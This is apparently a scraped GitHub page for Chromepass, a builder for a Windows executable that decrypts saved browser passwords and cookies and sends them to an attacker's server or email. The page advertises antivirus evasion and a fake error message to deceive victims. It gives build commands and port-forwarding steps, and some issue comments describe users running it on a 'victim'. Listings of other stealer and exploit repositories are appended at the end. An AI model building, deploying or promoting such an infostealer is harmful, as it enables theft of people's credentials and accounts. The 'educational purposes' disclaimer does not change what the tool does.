Chromepass - Hacking Chrome Saved Passwords

Overview

Chromepass - Hacking Chrome Saved Passwords and Cookies

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

View Demo · Report Bug · Request Feature

Table of Contents


About The project

Chromepass is a python-based console application that generates a windows executable with the following features:

  • Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies
  • Send a file with the login/password combinations and cookies remotely (http server or email)
  • Undetectable by AV if done correctly
  • Custom icon
  • Custom error message
  • Customize port

AV Detection!

The new client build methodology practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion.

An example of latest scans (note: within 10-12 hours we go from 0-2 detections to 32 detections so run the analysis on your own builds):


Getting started

Dependencies and Requirements

This is a very simple application, which uses only:

  • Python - Tested on python 3.9+

It recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.

Installation

Chromepass requires Windows to compile! Support for linux and macOS may be added soon.

Clone the repository:

git clone https://github.com/darkarp/chromepass

Note: Alternatively to cloning the repository, you can download the latest release, since the repository may be more bug-prone.

Install the dependencies:

The dependencies are checked and installed automatically, so you can just skip to Usage. It's recommended that you use a clean VM, just to make sure there are no conflicts.

If you don't have the dependencies and your internet isn't fast, this will take a while. Go grab some coffee.


Usage

Chromepass is very straightforward. Start by running:

python create.py -h

A list of options will appear and are self explanatory.

Running without any parameters will build the server and the client connecting to 127.0.0.1.

A simple example of a build:

python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

After creating the server and the client, make sure you're running the server when the client is ran.

The cookies and passwords will be saved in json files on a new folder called data in the same directory as the server, separated by ip address.


Email

Chromepass supports sending the files via email, although it's still experimental. To enable this, you can use the --email flag while creating the server. You'll need two things, a username (your email) and a password (an app password).

To generate an app password you must go into your account settings -> Security and enable 2-step authentication (required!)

After 2-step authentication is enabled, you'll see a new option called App Passwords: 2-step-authentication

You want to click there and then choose the appropriate options and then generate a password: 2-step-authentication

After clicking Generate it will give you the needed password. You can use the username and password directly in the command or you can simply put it inside the config.ini, where it says YOUR_USERNAME and YOUR_PASSWORD.

Example with credentials in command

python create.py --error --message 'An Error has happened' --email --username myuser@gmail.com --password qwertyuiopasdfghh

If you put the credentials in the config file (you'll see where if you open this file)

python create.py --error --message 'An Error has happened' --email

Remote Notes

If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port.
For more general information, click here. If you're still not satisfied, perform a google search.


Manual dependency installation

The automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually.
Fortunately, there are only 2 dependencies:

Instead of the build tools you can also just install visual studio but it will take more space.

After successfully installing the build tools, you can simply run the rustup-init.exe from Rustup's website.

This completes the required dependencies and you should be good to go.


Errors, Bugs and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.


Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: [email protected]


Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

License

AGPL-3.0


Code Intelligence Status

Demo

til

Comments
  • ImportError: DLL load failer: The specified module could not be found.

    ImportError: DLL load failer: The specified module could not be found.

    File "C:\Users\*****\Desktop\chrome-password-hacking-master\create_server.py", line 3, in import os, sys, cgi, py2exe, BaseHTTPServer, sqlite3, win32crypt ImportError: DLL load failed: The specified module could not be found.

    I have tried running the powershell command, and have installed python 2.7 in 32 bit and everything else in 32 bit. Not sure why it still doesn't work.

    Errors not related to the code Fixed 
    opened by bowser0000 14
  • I don't receive the email.

    I don't receive the email.

    I'm somewhat new to python and learning online. When I try it on my own PC I get this error Traceback (most recent call last): File "server.py", line 97, in File "server.py", line 38, in getpass File "shutil.pyo", line 82, in copyfile IOError: [Errno 2] No such file or directory: 'C:\\Users\DELL\AppData\Local\Google\Chrome\User Data\Default\Login Data' I'm stuck here. I could use your help. Thanks in advance.

    Complete 
    opened by newestmindcoder 11
  • Can't get it to work at all on multiple computers

    Can't get it to work at all on multiple computers

    I tried the steps on different windows 10 computers and cannot get it to work. There is always some sort of error. I don't know anything about programming so I don't know the issue. I currently don't have any screenshots of the error because I uninstalled/deleted everything related to it. I also couldn't get your malkit to work.

    I am currently downloading a Windows 10 VM in a last ditch effort. I just gotta ask: Does this only work on a VM?

    bug enhancement In progress 
    opened by Genus-learner 9
  • Gmail blocking, when it try to login on other devices.

    Gmail blocking, when it try to login on other devices.

    So yes, gmail sending me an alert that someone was trying to log into my account, and it blocking it. I tried to start it on second pc, and it worked, because i already was logging there. I tunred on "Let less secure apps access your account" of course, so I don't know what is the problem. So I tried getting files directly by IP. But it giving me .py output, not .exe. How to change it?...

    enhancement Complete Errors not related to the code 
    opened by Subucc 9
  • when i am trying to create server nothing is happened

    when i am trying to create server nothing is happened

    Describe the bug A clear and concise description of what the bug is.

    To Reproduce Steps to reproduce the behavior:

    1. Go to '...'
    2. Click on '....'
    3. Scroll down to '....'
    4. See error

    Expected behavior A clear and concise description of what you expected to happen.

    Screenshots If applicable, add screenshots to help explain your problem.

    Software(please complete the following information):

    • OS: [e.g. Windows 10 Pro x64]
    • Python Version [e.g. 3.7.4]
    • Python Environment [e.g. Normal python, conda env]

    Additional context Add any other context about the problem here. image

    Errors not related to the code 
    opened by kiopik 8
  • Issue with the code

    Issue with the code

    File "create_server.py", line 2, in import os, sys, cgi, py2exe, BaseHTPPServer, sqlite3 , win32crypt ImportError: DLL load failer: The specified module could not be found. Any idea?

    Errors not related to the code Fixed 
    opened by JohnMos 8
  • Only cookies being sent?

    Only cookies being sent?

    So I got it working on multiple computers but for some of them they client only sends cookies? I've tried running it as admin and that hasnt done anything to help that

    Any suggestions?

    bug Complete 
    opened by Genus-learner 7
  • Batch / Shell Scripts for building

    Batch / Shell Scripts for building

    Is your feature request related to a problem? Please describe. The README has a lot of steps that can take a while to complete, for example, the build process from the Demo, and the "AV Detection" segment of the readme instruction.

    Describe the solution you'd like .bat or .sh files can be used to automate most (if not all) of the steps necessary to build the application. Alternatively, a Python script can be used to run everything, which could make supporting cross-platform usage easier.

    enhancement Complete 
    opened by iCrazyBlaze 5
  • What about a fake SMTP server support instead of email ?

    What about a fake SMTP server support instead of email ?

    Just like this https://github.com/aydinnyunus/WifiPassword-Stealer

    Also what do you think about these methods of protecting the excitable Here https://github.com/hawksh/Hidden-miner-builder

    opened by minanagehsalalma 5
  • create_server.py stuck on *** searching for required modules ***

    create_server.py stuck on *** searching for required modules ***

    Hi, I've got an issue like the title of this thread. It comes up after the script builds the "build, bdist.win32, winexe, collect-2.7, bundle-2.7, temp and dist" folders. I'm using Python 2.7 and py2exe 32-bit like instructed. I chose the option to email the fetched passwords via Gmail, and send them to a different email than the mail I gave up to login on Gmail.

    What's going wrong here?

    (Quick edit: I've left the script running like this for quite a while, so I really think it's stuck rather than actually searching for modules...)

    Screenshot: issue

    Complete 
    opened by lucs29 5
  • Error

    Error

    When I try it out on my PC, it works fine. But when I send it to the victim. He gets the Fake Error. And I get an email, but the password and User area
    is blank.

    Complete Errors not related to the code 
    opened by GR8Zen 4
  • link.exe not found

    link.exe not found

    [+] Building Server Compiling proc-macro2 v1.0.28 Compiling syn v1.0.74 Compiling winapi v0.3.9 Compiling memchr v2.4.0 Compiling futures-core v0.3.16 Compiling proc-macro-hack v0.5.19 Compiling log v0.4.14 Compiling futures-sink v0.3.16 Compiling lazy_static v1.4.0 Compiling winapi v0.2.8 error: linker link.exe not found | = note: program not found

    note: the msvc targets depend on the msvc linker but link.exe was not found

    note: please ensure that VS 2013, VS 2015, VS 2017, VS 2019 or VS 2022 was installed with the Visual C++ option

    error: could not compile futures-core due to previous error warning: build failed, waiting for other jobs to finish... error: could not compile log due to previous error error: could not compile memchr due to previous error error: could not compile proc-macro-hack due to previous error error: could not compile syn due to previous error error: could not compile proc-macro2 due to previous error error: could not compile winapi due to previous error [-] Server couldn't be copied: [Errno 2] No such file or directory: 'templates/chromepass-server/target/release/chromepass-server.exe' [+] Building Client Compiling winapi v0.3.9 Compiling proc-macro2 v1.0.24 Compiling libc v0.2.99 Compiling syn v1.0.64 Compiling serde v1.0.127 Compiling serde_derive v1.0.127 Compiling log v0.4.14 Compiling memchr v2.3.4 error: linker link.exe not found | = note: program not found

    note: the msvc targets depend on the msvc linker but link.exe was not found

    note: please ensure that VS 2013, VS 2015, VS 2017, VS 2019 or VS 2022 was installed with the Visual C++ option

    error: could not compile log due to previous error warning: build failed, waiting for other jobs to finish... error: could not compile memchr due to previous error error: could not compile syn due to previous error error: could not compile serde_derive due to previous error error: could not compile serde due to previous error error: could not compile libc due to previous error error: could not compile proc-macro2 due to previous error error: could not compile winapi due to previous error [-] Client couldn't be copied: [Errno 2] No such file or directory: 'templates/chromepass-build/target/release/chromepass.exe' [-] Error building the server [-] Error building the client

    opened by LLSWIMS 1
  • Client not communicating with Server

    Client not communicating with Server

    I had this running great. I would double click the client, I would see the connection to the server and then the text files would generate. Then all of a sudden, the client stopped sending/communicating to the server.

    Here are my steps:

    -Run create.py with no parameters

    -Server and client built successfully

    -Run the server and keep it open

    -Run the client

    -Check the server...but server does not show a connection (just the usual "waiting for connections")

    I have used this successfully about a week ago both for local testing and with port forwarding and static ip but now I can't even get it to run locally. I have tried on 3 different computers which finish the build successfully w/no errors but I receive the same issue. All computers with the below specs:

    Running on: -Windows 10 Pro x64 -Python 3.10 -Built on both Pycharm and Powershell (I tried on both....which build successfully but I receive the same outcome) -No antivirus installed and Windows firewall is disabled -Downloaded a fresh copy of all files from Github -Also tried the exact copy I used a week ago

    One day it was working....the next it wasn't. Any suggestions on what I could try to get the communication to occur? CP

    bug In progress 
    opened by twhitey666 3
  • Emails not being received

    Emails not being received

    I've built the most recent version and the client and server are working perfectly but no emails are received. Is there any way to check on the client to check what is happening?

    I've also noticed the client won't include passwords synced using a Google account or imported passwords.

    bug In progress 
    opened by graemeh70 3
Releases(V4.1.4)
Owner
darkArp
Malware Analyst | Penetration Tester
darkArp
RDP Stealer

RDP Stealer RDP Stealer by lamp Require Python How To Use Download This Source Extract The Zip File Change webhook url Convert to exe send to target I

Lamp 14 Nov 26, 2022
Buffer Overflow para SLmail5.5 32 bits

SLmail5.5-Exploit-BoF Buffer Overflow para SLmail5.5 32 bits con un par de utilidades para que puedas hacer el tuyo REQUISITOS PARA QUE FUNCIONE: Desa

Luis Javier 15 Jul 30, 2022
Denial Attacks by Various Methods

Denial Service Attack Denial Attacks by Various Methods IIIIIIIIIIIIIIIIIIII PPPPPPPPPPPPPPPPP VVVVVVVV VVVVVVVV I::

Baris Dincer 9 Nov 26, 2022
A piece of software that shows a traceroute of a URL redirect path

Tracing URL redirects has never been easier! Usage • Download 🚩 Use Cases To see where an affiliate link ends up To see what affiliate network is bei

41 Nov 22, 2022
Sudo Baron Samedit Exploit

CVE-2021-3156 (Sudo Baron Samedit) This repository is CVE-2021-3156 exploit targeting Linux x64. For writeup, please visit https://datafarm-cybersecur

Worawit Wang 559 Jan 03, 2023
A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms

A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the Blackgound image of targets' computer. and decrypt the targets' encrypted files in our own compute

Li Ka Lok 2 Dec 02, 2022
Log4jake works by spidering a web application for GET/POST requests

Log4jake Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any di

16 May 09, 2022
The Linux defender anti-virus software ported to work on CentOS Linux.

By: Seanpm2001, Et; Al. Top README.md Read this article in a different language Sorted by: A-Z Sorting options unavailable ( af Afrikaans Afrikaans |

Sean P. Myrick V19.1.7.2 2 Sep 12, 2022
High level cheatsheet that was designed to make checks on the OSCP more manageable

High level cheatsheet that was designed to make checks on the OSCP more manageable. This repository however could also be used for your own studying or for evaluating test systems like on HackTheBox

Jacob Scheetz 89 Jan 01, 2023
Caretaker 2 Jun 06, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V

antx 9 Aug 31, 2022
Fast subdomain scanner, Takes arguments from a Json file ("args.json") and outputs the subdomains.

Fast subdomain scanner, Takes arguments from a Json file ("args.json") and outputs the subdomains. File Structure core/ colors.py db/ wordlist.txt REA

whoami security 4 Jul 02, 2022
A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps

boring-flutter A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps. Currently only supporting

Hamza 64 Oct 18, 2022
A token logger for discord + steals Brave/Chrome passwords and usernames

Backdoor Machine - ❗ For educational purposes only ❗ A program made in python for stealing passwords and usernames from Google Chrome/Brave and tokenl

36 Jul 18, 2021
Omega - From Wordpress admin to pty

The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Keep in mind that right now Omega only can attack Linux hosts.

Ángel Heredia 12 Nov 09, 2022
CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-R

Nicolas Krassas 104 Dec 08, 2022
Show apps recorded storage files by jailbreak

0x101 Show registered storage files of apps by jailbreak Legal disclaimer: Usage of insTof for attacking targets without prior mutual consent is illeg

0x 4 Oct 24, 2022
Automated tool to exploit basic buffer overflow remotely and locally & x32 and x64

Automated tool to exploit basic buffer overflow (remotely or locally) & (x32 or x64)

5 Oct 09, 2022
Recon is a script to perform a full recon on a target with the main tools to search for vulnerabilities.

👑 Recon 👑 The step of recognizing a target in both Bug Bounties and Pentest can be very time-consuming. Thinking about it, I decided to create my ow

Dirso 171 Dec 31, 2022